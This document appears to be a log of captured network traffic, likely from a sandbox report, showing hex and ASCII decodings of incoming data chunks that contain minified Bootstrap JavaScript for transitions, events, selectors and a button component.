2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 3a 65 2c 74 72 61 6e 73 69 74 69 6f 6e 44 65 6c 61 79 3a 69 7d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 3b 63 6f 6e 73 74 20 73 3d 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 65 29 2c 6e 3d 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 69 29 3b 72 65 74 75 72 6e 20 73 7c 7c 6e 3f 28 65 3d 65 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 69 3d 69 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 31 65 33 2a 28 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 65 29 2b 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 69 29 29 29 3a 30 7d 29 28 65 29 2b 35 3b 6c 65 74 20 6e 3d 21 31 3b 63 6f 6e 73 74 20 72 3d 28 7b 74 61 72 67 65 74 3a 69 7d 29 3d 3e 7b 69 3d Data Ascii: itionDuration:e,transitionDelay:i}=window.getComputedStyle(t);const s=Number.parseFloat(e),n=Number.parseFloat(i);return s\|\|n?(e=e.split(",")[0],i=i.split(",")[0],1e3*(Number.parseFloat(e)+Number.parseFloat(i))):0})(e)+5;let n=!1;const r=({target:i})=>{i=
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 3d 69 29 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 2c 65 2c 69 29 7b 63 6f 6e 73 74 20 73 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2c 6e 3d 73 3f 69 3a 65 7c 7c 69 3b 6c 65 74 20 6f 3d 4d 28 74 29 3b 72 65 74 75 72 6e 20 53 2e 68 61 73 28 6f 29 7c 7c 28 6f 3d 74 29 2c 5b 73 2c 6e 2c 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 2c 65 2c 69 2c 73 2c 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 21 74 29 72 65 74 75 72 6e 3b 6c 65 74 5b 6f 2c 72 2c 61 5d 3d 44 28 65 2c 69 2c 73 29 3b 69 66 28 65 20 69 6e 20 24 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 7c 7c 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 21 3d 3d 65 2e 64 65 Data Ascii: =i))}function D(t,e,i){const s="string"==typeof e,n=s?i:e\|\|i;let o=M(t);return S.has(o)\|\|(o=t),[s,n,o]}function N(t,e,i,s,n){if("string"!=typeof e\|\|!t)return;let[o,r,a]=D(e,i,s);if(e in $){const t=t=>function(e){if(!e.relatedTarget\|\|e.relatedTarget!==e.de
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 3d 6f 29 7b 69 66 28 68 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 29 29 78 28 74 2c 6c 2c 69 2c 65 2e 73 6c 69 63 65 28 31 29 29 3b 66 6f 72 28 63 6f 6e 73 74 5b 69 2c 73 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 63 29 29 7b 63 6f 6e 73 74 20 6e 3d 69 2e 72 65 70 6c 61 63 65 28 43 2c 22 22 29 3b 61 26 26 21 65 2e 69 6e 63 6c 75 64 65 73 28 6e 29 7c 7c 50 28 74 2c 6c 2c 72 2c 73 2e 63 61 6c 6c 61 62 6c 65 2c 73 2e 64 65 6c 65 67 61 74 69 6f 6e 53 65 6c 65 63 74 6f 72 29 7d 7d 65 6c 73 65 7b 69 66 28 21 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 50 28 74 2c 6c 2c 72 2c 6f 2c 6e 3f 69 3a 6e 75 6c 6c 29 7d 7d 2c 74 72 69 67 67 65 72 28 74 2c 65 2c 69 29 7b Data Ascii: =o){if(h)for(const i of Object.keys(l))x(t,l,i,e.slice(1));for(const[i,s]of Object.entries(c)){const n=i.replace(C,"");a&&!e.includes(n)\|\|P(t,l,r,s.callable,s.delegationSelector)}}else{if(!Object.keys(c).length)return;P(t,l,r,o,n?i:null)}},trigger(t,e,i){
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 69 2e 73 6c 69 63 65 28 31 2c 69 2e 6c 65 6e 67 74 68 29 2c 65 5b 69 5d 3d 7a 28 74 2e 64 61 74 61 73 65 74 5b 73 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 3a 28 74 2c 65 29 3d 3e 7a 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 60 64 61 74 61 2d 62 73 2d 24 7b 48 28 65 29 7d 60 29 29 7d 3b 63 6c 61 73 73 20 71 7b 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 54 79 70 65 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 59 6f 75 20 68 61 76 65 20 74 6f 20 69 6d 70 6c 65 6d 65 6e Data Ascii: .toLowerCase()+i.slice(1,i.length),e[i]=z(t.dataset[s])}return e},getDataAttribute:(t,e)=>z(t.getAttribute(`data-bs-${H(e)}`))};class q{static get Default(){return{}}static get DefaultType(){return{}}static get NAME(){throw new Error('You have to implemen
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 73 2e 5f 6d 65 72 67 65 43 6f 6e 66 69 67 4f 62 6a 28 74 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 41 66 74 65 72 4d 65 72 67 65 28 74 29 2c 74 68 69 73 2e 5f 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 74 29 2c 74 7d 73 74 61 74 69 63 20 67 65 74 49 6e 73 74 61 6e 63 65 28 74 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 28 63 28 74 29 2c 74 68 69 73 2e 44 41 54 41 5f 4b 45 59 29 7d 73 74 61 74 69 63 20 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 2c 65 3d 7b 7d 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 74 29 7c 7c 6e 65 77 20 74 68 69 73 28 74 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 75 6c 6c 29 7d 73 74 61 74 69 63 20 67 65 Data Ascii: s._mergeConfigObj(t,this._element),t=this._configAfterMerge(t),this._typeCheckConfig(t),t}static getInstance(t){return n.get(c(t),this.DATA_KEY)}static getOrCreateInstance(t,e={}){return this.getInstance(t)\|\|new this(t,"object"==typeof e?e:null)}static ge
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 5b 74 61 62 69 6e 64 65 78 5d 22 2c 27 5b 63 6f 6e 74 65 6e 74 65 64 69 74 61 62 6c 65 3d 22 74 72 75 65 22 5d 27 5d 2e 6d 61 70 28 28 74 3d 3e 60 24 7b 74 7d 3a 6e 6f 74 28 5b 74 61 62 69 6e 64 65 78 5e 3d 22 2d 22 5d 29 60 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 69 6e 64 28 65 2c 74 29 2e 66 69 6c 74 65 72 28 28 74 3d 3e 21 64 28 74 29 26 26 68 28 74 29 29 29 7d 2c 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 7b 63 6f 6e 73 74 20 65 3d 52 28 74 29 3b 72 65 74 75 72 6e 20 65 26 26 4b 2e 66 69 6e 64 4f 6e 65 28 65 29 3f 65 3a 6e 75 6c 6c 7d 2c 67 65 74 45 6c 65 6d 65 6e 74 46 72 6f 6d 53 65 6c 65 63 74 6f 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 52 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 4b Data Ascii: [tabindex]",'[contenteditable="true"]'].map((t=>`${t}:not([tabindex^="-"])`)).join(",");return this.find(e,t).filter((t=>!d(t)&&h(t)))},getSelectorFromElement(t){const e=R(t);return e&&K.findOne(e)?e:null},getElementFromSelector(t){const e=R(t);return e?K
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 69 76 65 22 29 29 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 4a 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 74 6f 67 67 6c 65 22 3d 3d 3d 74 26 26 65 5b 74 5d 28 29 7d 29 29 7d 7d 6a 2e 6f 6e 28 64 6f 63 75 6d 65 6e 74 2c 22 63 6c 69 63 6b 2e 62 73 2e 62 75 74 74 6f 6e 2e 64 61 74 61 2d 61 70 69 22 2c 47 2c 28 74 3d 3e 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 Data Ascii: element.setAttribute("aria-pressed",this._element.classList.toggle("active"))}static jQueryInterface(t){return this.each((function(){const e=J.getOrCreateInstance(this);"toggle"===t&&e[t]()}))}}j.on(document,"click.bs.button.data-api",G,(t=>{t.preventDefa
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 6c 74 61 58 3d 30 2c 65 26 26 76 28 65 3e 30 3f 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 72 69 67 68 74 43 61 6c 6c 62 61 63 6b 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6c 65 66 74 43 61 6c 6c 62 61 63 6b 29 7d 5f 69 6e 69 74 45 76 65 6e 74 73 28 29 7b 74 68 69 73 2e 5f 73 75 70 70 6f 72 74 50 6f 69 6e 74 65 72 45 76 65 6e 74 73 3f 28 6a 2e 6f 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 73 74 2c 28 74 3d 3e 74 68 69 73 2e 5f 73 74 61 72 74 28 74 29 29 29 2c 6a 2e 6f 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6e 74 2c 28 74 3d 3e 74 68 69 73 2e 5f 65 6e 64 28 74 29 29 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 22 29 29 3a 28 6a 2e 6f 6e 28 74 68 69 73 2e 5f 65 Data Ascii: ltaX=0,e&&v(e>0?this._config.rightCallback:this._config.leftCallback)}_initEvents(){this._supportPointerEvents?(j.on(this._element,st,(t=>this._start(t))),j.on(this._element,nt,(t=>this._end(t))),this._element.classList.add("pointer-event")):(j.on(this._e